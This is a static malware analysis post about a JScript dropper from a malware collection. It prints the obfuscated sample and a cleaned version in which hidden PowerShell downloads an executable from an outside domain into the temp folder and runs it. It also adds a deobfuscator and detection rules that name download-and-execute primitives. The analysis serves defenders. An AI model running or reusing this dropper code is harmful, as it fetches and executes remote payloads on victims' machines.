The “javascript-malware-collection” repository on GitHub collects malicious JavaScript samples gathered in the wild, each of them capable of compromising a system or stealing sensitive information.
Studying samples from this repository shows how JavaScript-based malware hides its logic and what it ultimately does.
In this brief static analysis we examine one sample from the repository.
We do not execute it; by inspecting the source code directly we aim to identify and explain its malicious components.
About Malicious Sample
The sample analysed here is dated January 10, 2017 and comes from the “javascript-malware-collection” repository on GitHub.
Cleaning The Code
In this part we strip the padding that surrounds the malicious logic and pull the relevant statements together.
The original sample is about 475 lines long; most of them exist only to bury the few statements that matter, so removing them gives us a clear view of what the script actually does.
// WScript object
var edeb = WScript;
var cqorobcit = edeb.CreateObject('WScript.Shell');
// Full command: cmd.exe /c "powershell ..." assembled from short string fragments.
// Every PowerShell fragment starts with '^', the cmd.exe escape character; cmd.exe
// removes it before powershell.exe starts, so the carets only defeat naive string matching.
// The backslash in the drop path is escaped (\\b) for the JS string literal; a bare \b would be a backspace.
var jqutzo = "cmd.exe /c \"po" + "we" + "rs" + "he" + "ll $ojogo='^dimas.top';$hetfo='^-Scope Pr';$pobbi='^,$path); ';$innypu='^ocess; $p';$monsucm='^y Bypass ';$binkucb='^h';$ykpyffy='^Start-Pro';$ykjygr='^:temp+''\\b';$uzmez='^e'');(New-';$xzymo='^Set-Execu';$ulirgo='^tp://laro';$eqtem='^ath=($env';$evyvz='^).Downloa';$ogxow='^Webclient';$utkyjv='^/777.exe''';$gsydibv='^tionPolic';$upoh='^stem.Net.';$zceqmi='^Object Sy';$cepsuhm='^ipbafa.ex';$qfyzko='^dFile(''ht';$awysqe='^cess $pat'; Invoke-Expression ($xzymo+$gsydibv+$monsucm+$hetfo+$innypu+$eqtem+$ykjygr+$cepsuhm+$uzmez+$zceqmi+$upoh+$ogxow+$evyvz+$qfyzko+$ulirgo+$ojogo+$utkyjv+$pobbi+$ykpyffy+$awysqe+$binkucb);\"";
// Execution: tdurot and ctywo are defined elsewhere in the sample and resolve to "run" and 0 (hidden window)
cqorobcit[tdurot](jqutzo, ctywo);
Now, instead of wading through 475 lines of padding, we are looking at four statements. The PowerShell payload is still split into 21 string fragments assigned to random variable names, and Invoke-Expression concatenates them in an order that has nothing to do with the order in which they are assigned. Reassembling the string in ‘jqutzo’ takes three steps: remove every ‘^’ (the cmd.exe escape character, which cmd.exe strips before PowerShell ever sees the line), concatenate the fragments in the order given in the Invoke-Expression argument, and collapse each doubled single quote ('') to a single one, since that is how PowerShell escapes a quote inside a single-quoted string. The result is:
Set-ExecutionPolicy Bypass -Scope Process; $path=($env:temp+'\bipbafa.exe');(New-Object System.Net.Webclient).DownloadFile('http://larodimas.top/777.exe',$path); Start-Process $path
This is the command Invoke-Expression finally runs: one download, one dropped file, one Start-Process. Before explaining what it does, let’s put the code into its final form.
// WScript object
var script = WScript;
var Ws = script.CreateObject('WScript.Shell');
// PowerShell command, with the cmd.exe wrapper and the Invoke-Expression indirection removed
var powershellCommand = "powershell -Command \"Set-ExecutionPolicy Bypass -Scope Process; $path=($env:temp+'\\bipbafa.exe'); (New-Object System.Net.WebClient).DownloadFile('http://larodimas.top/777.exe',$path); Start-Process $path\"";
// Execution: WScript.Shell.Run with window style 0, so no console window is shown to the user
Ws["run"](powershellCommand, 0);
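The reassembly described above can be done mechanically, which matters once you have a few hundred samples built the same way. The following Python deobfuscator is an added example, not code from the original post or from the sample: it takes the value of ‘jqutzo’ (copied from the cleaned snippet above, without the cmd.exe wrapper), strips the cmd.exe carets, parses the fragment assignments and the Invoke-Expression order, rebuilds the command and pulls the URL and drop path out of it. The regular expressions assume the fragment layout this sample uses, and the ‘%TEMP%’ rendering of the drop path is a presentation choice.

```python
import re

# Payload string copied from the jqutzo variable of the sample above, without the
# cmd.exe /c "powershell ..." wrapper. Raw string so '\b' stays two characters.
OBFUSCATED = r"""$ojogo='^dimas.top';$hetfo='^-Scope Pr';$pobbi='^,$path); ';$innypu='^ocess; $p';$monsucm='^y Bypass ';$binkucb='^h';$ykpyffy='^Start-Pro';$ykjygr='^:temp+''\b';$uzmez='^e'');(New-';$xzymo='^Set-Execu';$ulirgo='^tp://laro';$eqtem='^ath=($env';$evyvz='^).Downloa';$ogxow='^Webclient';$utkyjv='^/777.exe''';$gsydibv='^tionPolic';$upoh='^stem.Net.';$zceqmi='^Object Sy';$cepsuhm='^ipbafa.ex';$qfyzko='^dFile(''ht';$awysqe='^cess $pat'; Invoke-Expression ($xzymo+$gsydibv+$monsucm+$hetfo+$innypu+$eqtem+$ykjygr+$cepsuhm+$uzmez+$zceqmi+$upoh+$ogxow+$evyvz+$qfyzko+$ulirgo+$ojogo+$utkyjv+$pobbi+$ykpyffy+$awysqe+$binkucb);"""

# $name='value', where a literal quote inside the value is written as ''
ASSIGN_RE = re.compile(r"\$(\w+)='((?:[^']|'')*)'")
# Invoke-Expression ($a+$b+...) gives the reassembly order
IEX_RE = re.compile(r"Invoke-Expression\s*\(\s*((?:\$\w+\s*\+\s*)*\$\w+)\s*\)", re.IGNORECASE)


def strip_cmd_carets(text):
    """cmd.exe treats ^ as its escape character and removes it before
    powershell.exe is started, so the carets never reach PowerShell."""
    return text.replace("^", "")


def parse_assignments(text):
    """Map each $variable to its string value, collapsing '' to '."""
    return {name: value.replace("''", "'") for name, value in ASSIGN_RE.findall(text)}


def parse_iex_order(text):
    """Return the variable names in the order Invoke-Expression concatenates them."""
    match = IEX_RE.search(text)
    if match is None:
        raise ValueError("no Invoke-Expression concatenation found")
    return re.findall(r"\$(\w+)", match.group(1))


def deobfuscate(text):
    """Reassemble the PowerShell command that Invoke-Expression would run."""
    cleaned = strip_cmd_carets(text)
    fragments = parse_assignments(cleaned)
    order = parse_iex_order(cleaned)
    missing = [name for name in order if name not in fragments]
    if missing:
        raise ValueError("fragments never assigned: %s" % ", ".join(missing))
    return "".join(fragments[name] for name in order)


def extract_iocs(command):
    """Pull the network and file indicators out of the reassembled command."""
    urls = re.findall(r"https?://[^\s'\"),]+", command)
    drop = re.search(r"\$env:temp\+'([^']+)'", command, re.IGNORECASE)
    return {
        "urls": urls,
        # %TEMP% is our own rendering of $env:temp, not something the sample prints
        "drop_path": "%TEMP%" + drop.group(1) if drop else None,
    }


if __name__ == "__main__":
    command = deobfuscate(OBFUSCATED)
    print(command)
    print(extract_iocs(command))
```

The deobfuscator refuses to guess: if Invoke-Expression references a variable that was never assigned, it raises instead of silently dropping the fragment, which is the failure you want to notice when a sample uses a second assignment syntax you have not handled yet.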
Purpose of Malicious Sample
The script is a hidden download-and-execute dropper, and not an especially sophisticated one.
WScript.Shell.Run starts cmd.exe with window style 0, so no console window appears; cmd.exe strips the carets and starts PowerShell; and the reassembled PowerShell does three things: it sets the execution policy to Bypass for the current process (boilerplate that only matters for script files, not for a command passed on the command line), downloads http://larodimas.top/777.exe with System.Net.WebClient into %TEMP%\bipbafa.exe, and launches that file with Start-Process.
The dropper itself says nothing about what 777.exe is; it could be ransomware, a credential stealer or a remote access tool, and only obtaining and analysing the second stage would tell.
What the static analysis does give us is a set of indicators: the domain larodimas.top, the download URL, the drop path in the user’s temporary directory, and the process chain wscript.exe → cmd.exe → powershell.exe, all of it hidden from the user.
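The process chain and command-line features just described are also what a defender can hunt for. The following Python is an added example, not part of the original post: it runs four simple rules (script host spawning a shell, caret-heavy cmd.exe command lines, PowerShell that both downloads and executes, and an execution-policy bypass) over constructed process-creation events in the shape of Sysmon Event ID 1. The first three events approximate what this sample would generate; the last two are benign noise for contrast. The field names, file paths, the abridged cmd.exe command line and the benign commands are all assumptions.

```python
import ntpath
import re

# Constructed events shaped like Sysmon Event ID 1 (process creation); not real
# telemetry. Events 0-2 approximate the chain the sample above produces, with the
# cmd.exe command line abridged to five fragments; 3 and 4 are benign noise.
EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" C:\Users\user\Downloads\invoice.js'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'''cmd.exe /c "powershell $xzymo='^Set-Execu';$gsydibv='^tionPolic';$monsucm='^y Bypass ';$hetfo='^-Scope Pr';$innypu='^ocess; $p'; Invoke-Expression ($xzymo+$gsydibv+$monsucm+$hetfo+$innypu)"'''},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell Set-ExecutionPolicy Bypass -Scope Process; $path=($env:temp+'\bipbafa.exe');(New-Object System.Net.Webclient).DownloadFile('http://larodimas.top/777.exe',$path); Start-Process $path"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c dir C:\Temp"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Download primitive and execution primitive must both be present to fire the downloader rule
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Net\.WebClient|Invoke-WebRequest", re.IGNORECASE)
EXEC_RE = re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.IGNORECASE)
POLICY_RE = re.compile(r"-ExecutionPolicy\s+Bypass|Set-ExecutionPolicy\s+Bypass", re.IGNORECASE)
# Three carets in one cmd.exe line is already unusual for legitimate use
CARET_THRESHOLD = 3


def basename(path):
    """Lower-cased file name of a Windows path, so rules match on the image name only."""
    return ntpath.basename(path).lower()


def rules_for(event):
    """Return the names of the rules the event matches (empty list if none)."""
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmdline = event["cmdline"]
    hits = []
    if parent in SCRIPT_HOSTS and image in SHELLS:
        hits.append("script_host_spawns_shell")
    if image == "cmd.exe" and cmdline.count("^") >= CARET_THRESHOLD:
        hits.append("cmd_caret_obfuscation")
    if image == "powershell.exe":
        if DOWNLOAD_RE.search(cmdline) and EXEC_RE.search(cmdline):
            hits.append("powershell_download_and_execute")
        if POLICY_RE.search(cmdline):
            hits.append("powershell_execution_policy_bypass")
    return hits


def scan(events):
    """Map event index to matched rules, for the events that matched at least one."""
    flagged = {}
    for index, event in enumerate(events):
        hits = rules_for(event)
        if hits:
            flagged[index] = hits
    return flagged


if __name__ == "__main__":
    for index, hits in scan(EVENTS).items():
        print(index, basename(EVENTS[index]["image"]), hits)
```

Note that the parent/child rule fires on the cmd.exe event, not on the PowerShell one: the cmd.exe hop is what this family uses to get caret escaping for free, so a rule that only looks for wscript.exe spawning powershell.exe directly would miss it. The download-and-execute rule deliberately requires both primitives; a script that only downloads is common in administration, one that downloads into %TEMP% and immediately runs the result is not.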
Conclusion
This brief analysis confirms the malicious nature of the investigated JavaScript code, sourced from a repository that collects JavaScript malware.
By dissecting its components we found a conventional download-and-execute dropper hidden behind three layers of cheap obfuscation: random identifiers and padding in the JScript, a PowerShell command split into string fragments and reassembled by Invoke-Expression, and cmd.exe caret escapes sprinkled through every fragment; WScript.Shell is used only to launch the chain with a hidden window.